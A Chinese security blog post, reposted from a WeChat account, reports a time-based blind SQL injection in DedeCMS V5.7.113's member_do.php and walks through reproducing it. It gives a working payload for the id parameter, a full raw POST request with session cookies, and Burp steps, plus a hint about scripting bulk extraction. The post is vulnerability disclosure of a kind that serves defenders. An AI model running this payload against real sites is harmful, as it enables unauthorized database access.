DedeCMS V5.7.113 member_do.php 存在 SQL 注入

admin
admin
admin
140816
文章
117
评论
2025年5月16日12:03:46评论5 views字数 1807阅读6分1秒阅读模式

0

代码审计

DedeCMS V5.7.113 member_do.php 存在 SQL 注入

审计过程中发现 sql 大多数执行的函数都做了安全过滤

看上去比较严格所以暂时先给放放,而且单引号和双引号都会被转义 所以重心放在没进行安全过滤的 sql 执行函数上

最后让我找到这个

DedeCMS V5.7.113 member_do.php 存在 SQL 注入

全局搜索调用该函数的地方,找那些没被单双引号包裹且调用了该函数的参数 发现在 /dede/member_do.php 处符合这个条件

DedeCMS V5.7.113 member_do.php 存在 SQL 注入

尝试调用该接口

poc: 0,if(1=1,sleep(1),1))#
POST /uploads/dede/member_do.php HTTP/1.1 Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*; q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 146Origin: http://localhost Connection: closeReferer: http://localhost/uploads/dede/member_do.php?dopost=delmembersCookie: menuitems=1_1%2C2_1%2C3_1%2C5_1%2C4_1%2C6_1; phpwcmsBELang=en;DedeUserID=2; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=3fcc9fad37b68ff5; DedeLoginTime=1712921164;DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=8b4f27ab87b75380; PHPSESSID=gn3htbrm7v85qdvfleh8j3tktc;_csrf_name_1a3bc368=078e0297d33d9179cff1fd025279567e;_csrf_name_1a3bc3681BH21ANI1AGD297L1FF21LN02BGE1DNG=336618e7a1ab3618; ENV_GOBACK_URL=%2Fuploads%2Fdede%2Fmember_main.phpUpgrade-Insecure-Requests: 1 Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-origin Sec-Fetch-User: ?1fmdo=yes&dopost=delmembers&id=0%2Cif(1%3D1%2Csleep(3)%2C1))%23&randcode=11329&sa fecode=767bc86b89066cde37daee26&safecode=767bc86b89066cde37daee26&imageField1.x= 33&imageField1.y=2

看看相应的时间

这里 sleep 的具体时间是 用户数 * 我给定的 sleep 时间 当前用户数是 2,所以 sleep(3) 是睡眠 2 * 3 = 6s

1

漏洞复现

首先在官网下最新版: https://www.dedecms.com/

DedeCMS V5.7.113 member_do.php 存在 SQL 注入

登录后访问该链接

http://localhost/uploads/dede/member_do.php?dopost=delmembers

到如图所示页面

DedeCMS V5.7.113 member_do.php 存在 SQL 注入

(PS:批量跑数据其实就多一步,写个脚本获取这个安全验证串就行...) 复制右边的字符串,开代理点确定,会抓到下面这个包

DedeCMS V5.7.113 member_do.php 存在 SQL 注入

SQL 注入点在 id 参数,将其值改为 : 0,if(1=1,sleep(1),1))# 然后 Send to Repeater ,点 Send

DedeCMS V5.7.113 member_do.php 存在 SQL 注入

发现响应时间变长了,证明 SQL 注入漏洞存在

No.2

原文始发于微信公众号(隐雾安全):DedeCMS V5.7.113 member_do.php 存在 SQL 注入

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月16日12:03:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DedeCMS V5.7.113 member_do.php 存在 SQL 注入https://cn-sec.com/archives/4071861.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息